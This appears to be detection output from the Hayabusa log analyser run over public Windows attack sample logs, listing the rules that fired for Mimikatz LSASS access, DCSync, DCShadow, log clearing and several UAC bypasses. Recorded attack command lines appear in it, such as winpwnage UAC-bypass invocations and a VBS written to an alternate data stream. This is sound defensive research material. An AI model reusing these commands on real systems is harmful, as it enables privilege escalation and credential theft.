+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx
+2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx
+2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx
+2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx
+2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx
+2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.281 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2852 | PGUID: 365ABB72-95E5-5CD3-0000-001065730F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.297 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2364 | PGUID: 365ABB72-95E5-5CD3-0000-001033750F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:21.594 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 2800 | PGUID: 365ABB72-95E5-5CD3-0000-0010E1890F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData:tghjx5xz2ky.vbs | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,15,info,,Alternate Data Stream Created,Path: C:\Users\IEUser\AppData | Process: C:\Windows\system32\cmd.exe | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00 | Hash: Unknown,rules/hayabusa/sysmon/events/15_AlternateDataStreamCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2812 | PGUID: 365ABB72-95E7-5CD3-0000-001046950F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.500 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 11:52:23.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3784 | PGUID: 365ABB72-95E7-5CD3-0000-001004970F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx
+2019-05-09 12:25:24.896 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3184 | PGUID: 365ABB72-9DA4-5CD3-0000-00102E692F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x13add | PID: 2920 | PGUID: 365ABB72-9DA4-5CD3-0000-00107F7A2F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx
+2019-05-10 21:21:57.077 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a4f | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:02.434 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | Process: c:\python27\python.exe | PID: 4076 | PGUID: 365ABB72-6CE5-5CD5-0000-00104BC61B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" | Process: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\perfmon.exe"" | LID: 0x13a11 | PID: 1644 | PGUID: 365ABB72-6CF0-5CD5-0000-0010140F1C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 21:22:08.465 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx
+2019-05-10 22:32:48.200 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 2796 | PGUID: 365ABB72-7D80-5CD5-0000-00100AD01300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:48.412 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:32:58.549 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\CompMgmtLauncher.exe"" | LID: 0x141f8 | PID: 2076 | PGUID: 365ABB72-7D86-5CD5-0000-0010CC2E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /priv | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""c:\Windows\System32\cmd.exe"" | LID: 0x141f8 | PID: 2524 | PGUID: 365ABB72-7DA9-5CD5-0000-00100ED31400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami Showing Privileges,,rules/sigma/process_creation/proc_creation_win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx
+2019-05-10 22:49:29.586 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14241 | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:29.789 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\NTWDBLIB.dll | Process: c:\python27\python.exe | PID: 3552 | PGUID: 365ABB72-8169-5CD5-0000-0010D7982300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:29.789 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:34.946 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 1700 | PGUID: 365ABB72-816E-5CD5-0000-0010FEB62300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
